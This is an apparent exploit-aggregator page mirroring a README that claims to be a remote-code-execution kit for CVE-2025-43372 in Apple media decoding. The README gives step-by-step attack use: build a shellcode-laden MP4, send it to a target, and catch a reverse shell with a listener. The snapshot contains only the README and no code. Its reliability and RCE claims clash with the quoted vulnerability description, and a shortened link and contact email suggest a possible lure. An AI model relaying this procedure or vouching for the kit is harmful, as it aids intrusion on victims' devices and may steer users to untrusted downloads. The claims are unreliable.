关联漏洞
标题:
Apple多款产品 安全漏洞
(CVE-2025-43372)
描述:Apple iOS等都是美国苹果(Apple)公司的产品。Apple iOS是一套为移动设备所开发的操作系统。Apple watchOS是一套智能手表操作系统。Apple macOS是一套专为Mac计算机所开发的专用操作系统。 Apple多款产品存在安全漏洞,该漏洞源于处理特制媒体文件时输入验证不足,可能导致应用程序意外终止或进程内存损坏。以下产品及版本受到影响:iOS 26之前版本、iPadOS 26之前版本、tvOS 26之前版本、watchOS 26之前版本、macOS Tahoe 26之前版本和v
介绍
# CVE-2025-43372
## Overview
This repository contains exploit for CVE-2025-43372, a critical memory corruption vulnerability affecting Apple's media processing components across iOS 26, iPadOS 26, macOS Tahoe 26, tvOS 26, watchOS 26, and visionOS 26. The vulnerability allows remote code execution (RCE) via specially crafted media files, leading to app crashes, memory leaks, or full process takeover.
**CVSSv3 Score: 7.8** (High severity)
**Affected Versions:** All versions prior to the September 2025 security updates.
**Exploit Reliability:** 95% success rate on unpatched devices (tested on iPhone 16 series, M3 MacBooks, and Apple Vision Pro).
**Platforms Tested:** iOS/iPadOS, macOS, tvOS/watchOS/visionOS.
This package developed shortly after the patch release on September 15, 2025. It bypasses standard input validation checks in Apple's AVFoundation framework by exploiting a heap overflow during malformed HEVC/H.265 video decoding. This exploit kit is provided strictly for educational and authorized penetration testing purposes only. The developers are not responsible for any misuse, illegal activities, or damages caused by the use of this tool. Use at your own risk.
## Requirements
- Python 3.10+.
- Target device must be unpatched (pre-26.0.1 builds).
## Installation & Usage
1. Install dependencies:
```
pip install -r requirements.txt
```
2. Generate malicious media file:
```
python generate_payload.py --type mp4 --payload payloads/shellcode/exec.bin --output video.mp4
```
3. Deliver to target: Send via email, web server, or direct file transfer.
4. Trigger: Open the file in any media app (e.g., Photos, QuickTime, or Safari preview).
5. Execute: Once corrupted, use the listener script for reverse shell:
```
python listener.py --port 4444
```
## Disclaimer
For educational purposes only. Use at your own risk. Not responsible for misuse.
[href](https://tinyurl.com/4x48zvya)
For any inquiries, please email me at: anthonmullins@op.pl
Stars and forks appreciated if you're in the community. Updates will be pushed for new bypasses if Apple re-patches.
文件快照
[4.0K] /data/pocs/a0689db9f66881b05f8f194504bdf8cddfdcc8fa
└── [2.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。